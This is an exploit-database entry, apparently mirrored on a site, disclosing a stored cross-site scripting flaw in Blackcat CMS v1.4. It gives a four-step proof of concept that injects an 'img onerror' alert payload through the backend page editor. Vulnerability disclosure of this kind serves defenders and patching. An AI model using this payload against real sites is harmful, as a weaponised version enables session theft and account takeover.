[] NeoSense
E X P L O I T S
title author type platform port cve id

Blackcat Cms v1.4 - Stored XSS

Author: Mirabbas Ağalarov
type: webapps
platform: php
port: 
date_added: 2023-07-19 
date_updated: 2023-07-19 
verified: 0 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 
Exploit Title: Blackcat Cms v1.4 - Stored XSS
Application: blackcat Cms
Version: v1.4
Bugs:  Stored XSS
Technology: PHP
Vendor URL: https://blackcat-cms.org/
Software Link: https://github.com/BlackCatDevelopment/BlackCatCMS
Date of found: 13.07.2023
Author: Mirabbas Ağalarov
Tested on: Linux


2. Technical Details & POC
========================================
steps:

1. login to account
2. go to pages (http://localhost/BlackCatCMS-1.4/upload/backend/pages/modify.php?page_id=1)
3. set as <img src=x onerror=alert(4)>
4. Visit http://localhost/BlackCatCMS-1.4/upload/page/welcome.php?preview=1
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.